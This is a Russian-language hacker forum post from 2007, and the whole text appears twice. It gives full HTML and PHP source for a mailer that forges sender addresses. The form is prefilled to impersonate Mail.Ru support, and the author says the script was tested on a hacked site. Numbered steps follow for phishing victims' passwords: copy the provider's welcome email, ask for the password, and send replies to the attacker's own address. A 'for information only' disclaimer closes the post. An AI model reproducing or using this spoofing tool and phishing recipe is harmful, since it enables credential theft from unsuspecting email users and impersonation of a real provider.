[x26]VOLAND
16.07.2007, 09:40
Так как долгие поиски достойного скрипта для анонимной отправки почты результатов не принесли, я решил написать свой php-мейлер. Этот мануал предназначен прежде всего для новичков, которых отправка анонимного письма ставит в тупик.
Возможности:
+ Фальсификация адреса отправителя
+ Возможность изменения обратного адреса/имени (Поле Reply-to)
+ Отправка на несколько адресов сразу
+ Отправка html-писем
Наш мейлер будет состоять из двух файлов:
index.html - файл с формой для ввода информации
poster.php - ядро, посылающее e-mail
Index.html:
<html>
<head>
<title>HTML E-mail Send</title>
<style type="text/css">
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
text-decoration: none;
color: #000000;
background-color: 5a5959;
}
a {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
text-decoration: none;
font-weight: bold;
color: white;
}
a:visited {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
text-decoration: none;
font-weight: bold;
}
a:hover {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
text-decoration: underline;
font-weight: bold;
color: white;
}
.text { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #000000}
</style>
<body leftMargin=0 topMargin=0 marginwidth=0 marginheight=0>
<table border=0 width=640 cellpadding=0 cellspacing=1>
<tr><td vAlign=top width=120>
</td><td align=left vAlign=top width=540>
<p>
<p><table border=0 cellpadding=0 cellspacing=0 width=500>
<tr class=c3>
</tr>
<tr align=left class=c2>
<p align=left><font align=center color=orange size=3 face="Verdana"><br>
<b>HTML E-mail Send</font></b><br><br>
<font color=orange size=1 face="Verdana"><b>If you want to send E-mail to some adresses, divide them with comas<br>(e.g.: user@domain.com,user2@domain2.com)</b></font><br>
<font face="verdana" color=white size=1><b>
<FORM METHOD=POST ACTION=poster.php TARGET=_top>
<br>
Target E-mail: <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="email" SIZE=48 MAXLENGTH=512 VALUE=""><br>
From (Name): <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="fromname" SIZE=48 MAXLENGTH=512 VALUE="Администрация Mail.Ru"><br>
From (E-mail): <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="fromemail" SIZE=48 MAXLENGTH=512 VALUE="support@corp.mail.ru"><br>
Reply-to: <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="reply" SIZE=48 MAXLENGTH=512 VALUE=""><br>
Subject: <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="subject" SIZE=48 MAXLENGTH=512 VALUE="<subject>"><br><br>
Message Text (You can use any html-tags):<br><TEXTAREA STYLE="font-family:verdana;font-size:7.5pt" NAME="message" ROWS=18 COLS=100 WRAP=VIRTUAL>
<html>
<body>
<b>message</b>
</body>
</html></TEXTAREA><br>
</b></font>
<p align=center><INPUT STYLE="font-family:verdana;font-size:7.5pt;" TYPE="submit" VALUE=" SEND » " alt="Send it!">
</tr>
<tr>
<br>
<b><font color=orange size=1 face="Verdana"><li>Coded by [x26]VOLAND</font></b>
</tr>
</table>
</body></html>
Poster.php:
<html>
<head>
</head>
<body bgcolor=5a5959 text=000000 link=white vlink=orange leftMargin=0 topMargin=0 marginwidth=0 marginheight=0>
<?
//Присваиваем данные:
$email = $HTTP_POST_VARS['email'];
$reply = $HTTP_POST_VARS['reply'];
$subject = $HTTP_POST_VARS['subject'];
$message = $HTTP_POST_VARS['message'];
$fromname = $HTTP_POST_VARS['fromname'];
$fromemail = $HTTP_POST_VARS['fromemail'];
//Прописываем шапку письма:
$headers = 'From: '."$fromname".' <'."$fromemail".'>'."\r\n";
$headers .= "Reply-To: $reply"."\r\n";
$headers .= 'MIME-Version: 1.0'."\r\n";
$headers .= 'Content-Type: text/html'."\r\n"; // Устанавливаем html-формат письма
$headers .= 'Content-Transfer-Encoding: quoted-printable'."\r\n";
//Отправляем почту
mail($email,$subject,$message,$headers);
print "<br><p align=center><font color=lime face=\"Verdana\"><b>E-mail has succesfully sent</b></font>";
?>
</body>
</html>
Загружаем два полученных файла на хост с поддержкой php и sendmail. Теперь наш мейлер будет доступен по адресу http://your_site/../index.html
Страничка будет выглядит так:
http://x26-voland.narod.ru/files/other/mail.html
На данный момент у меня нет сайта с поддержкой php на публичном хосте, так что показать всю силу мейлера я не могу.
Скрипт тестировался на одном из взломанных сайтов. Всё работает на ура.
Пример использования.
Данный мейлер отлично подходит для соц.инженерии.
1. Регистрирум мыло на любом сервисе.
2. В новом ящике должно оказаться приветственное письмо от администрации. Сохраняем его html-код и заменяем текст приветствия на наш, содержащий просьбу выслать пароль по определённым причинам (тут всё зависит от вашей фантазии).
3. Заходим в наш мейлер и вставляем html-код полученного письма в поле message, в поля from вписываем админские имя и мыло.
4. Допустим, вы зарегились на mail.ru. Тогда в поле From (E-mail) вбиваем support@corp.mail.ru, в From (Name) - Администрация Mail.Ru, в Reply-To - любой ваш e-mail.
5. Вводи мыло жертвы, жмём кнопку Send и ждём пасс.
=============
Данная статья предназначена только для ознакомления и не является руководством к действию. Автор не несёт ответственности за её использование.
=============
Возможности:
+ Фальсификация адреса отправителя
+ Возможность изменения обратного адреса/имени (Поле Reply-to)
+ Отправка на несколько адресов сразу
+ Отправка html-писем
Наш мейлер будет состоять из двух файлов:
index.html - файл с формой для ввода информации
poster.php - ядро, посылающее e-mail
Index.html:
<html>
<head>
<title>HTML E-mail Send</title>
<style type="text/css">
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
text-decoration: none;
color: #000000;
background-color: 5a5959;
}
a {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
text-decoration: none;
font-weight: bold;
color: white;
}
a:visited {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
text-decoration: none;
font-weight: bold;
}
a:hover {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
text-decoration: underline;
font-weight: bold;
color: white;
}
.text { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #000000}
</style>
<body leftMargin=0 topMargin=0 marginwidth=0 marginheight=0>
<table border=0 width=640 cellpadding=0 cellspacing=1>
<tr><td vAlign=top width=120>
</td><td align=left vAlign=top width=540>
<p>
<p><table border=0 cellpadding=0 cellspacing=0 width=500>
<tr class=c3>
</tr>
<tr align=left class=c2>
<p align=left><font align=center color=orange size=3 face="Verdana"><br>
<b>HTML E-mail Send</font></b><br><br>
<font color=orange size=1 face="Verdana"><b>If you want to send E-mail to some adresses, divide them with comas<br>(e.g.: user@domain.com,user2@domain2.com)</b></font><br>
<font face="verdana" color=white size=1><b>
<FORM METHOD=POST ACTION=poster.php TARGET=_top>
<br>
Target E-mail: <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="email" SIZE=48 MAXLENGTH=512 VALUE=""><br>
From (Name): <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="fromname" SIZE=48 MAXLENGTH=512 VALUE="Администрация Mail.Ru"><br>
From (E-mail): <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="fromemail" SIZE=48 MAXLENGTH=512 VALUE="support@corp.mail.ru"><br>
Reply-to: <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="reply" SIZE=48 MAXLENGTH=512 VALUE=""><br>
Subject: <INPUT TYPE=text STYLE="font-family:tahoma;font-size:7.5pt" NAME="subject" SIZE=48 MAXLENGTH=512 VALUE="<subject>"><br><br>
Message Text (You can use any html-tags):<br><TEXTAREA STYLE="font-family:verdana;font-size:7.5pt" NAME="message" ROWS=18 COLS=100 WRAP=VIRTUAL>
<html>
<body>
<b>message</b>
</body>
</html></TEXTAREA><br>
</b></font>
<p align=center><INPUT STYLE="font-family:verdana;font-size:7.5pt;" TYPE="submit" VALUE=" SEND » " alt="Send it!">
</tr>
<tr>
<br>
<b><font color=orange size=1 face="Verdana"><li>Coded by [x26]VOLAND</font></b>
</tr>
</table>
</body></html>
Poster.php:
<html>
<head>
</head>
<body bgcolor=5a5959 text=000000 link=white vlink=orange leftMargin=0 topMargin=0 marginwidth=0 marginheight=0>
<?
//Присваиваем данные:
$email = $HTTP_POST_VARS['email'];
$reply = $HTTP_POST_VARS['reply'];
$subject = $HTTP_POST_VARS['subject'];
$message = $HTTP_POST_VARS['message'];
$fromname = $HTTP_POST_VARS['fromname'];
$fromemail = $HTTP_POST_VARS['fromemail'];
//Прописываем шапку письма:
$headers = 'From: '."$fromname".' <'."$fromemail".'>'."\r\n";
$headers .= "Reply-To: $reply"."\r\n";
$headers .= 'MIME-Version: 1.0'."\r\n";
$headers .= 'Content-Type: text/html'."\r\n"; // Устанавливаем html-формат письма
$headers .= 'Content-Transfer-Encoding: quoted-printable'."\r\n";
//Отправляем почту
mail($email,$subject,$message,$headers);
print "<br><p align=center><font color=lime face=\"Verdana\"><b>E-mail has succesfully sent</b></font>";
?>
</body>
</html>
Загружаем два полученных файла на хост с поддержкой php и sendmail. Теперь наш мейлер будет доступен по адресу http://your_site/../index.html
Страничка будет выглядит так:
http://x26-voland.narod.ru/files/other/mail.html
На данный момент у меня нет сайта с поддержкой php на публичном хосте, так что показать всю силу мейлера я не могу.
Скрипт тестировался на одном из взломанных сайтов. Всё работает на ура.
Пример использования.
Данный мейлер отлично подходит для соц.инженерии.
1. Регистрирум мыло на любом сервисе.
2. В новом ящике должно оказаться приветственное письмо от администрации. Сохраняем его html-код и заменяем текст приветствия на наш, содержащий просьбу выслать пароль по определённым причинам (тут всё зависит от вашей фантазии).
3. Заходим в наш мейлер и вставляем html-код полученного письма в поле message, в поля from вписываем админские имя и мыло.
4. Допустим, вы зарегились на mail.ru. Тогда в поле From (E-mail) вбиваем support@corp.mail.ru, в From (Name) - Администрация Mail.Ru, в Reply-To - любой ваш e-mail.
5. Вводи мыло жертвы, жмём кнопку Send и ждём пасс.
=============
Данная статья предназначена только для ознакомления и не является руководством к действию. Автор не несёт ответственности за её использование.
=============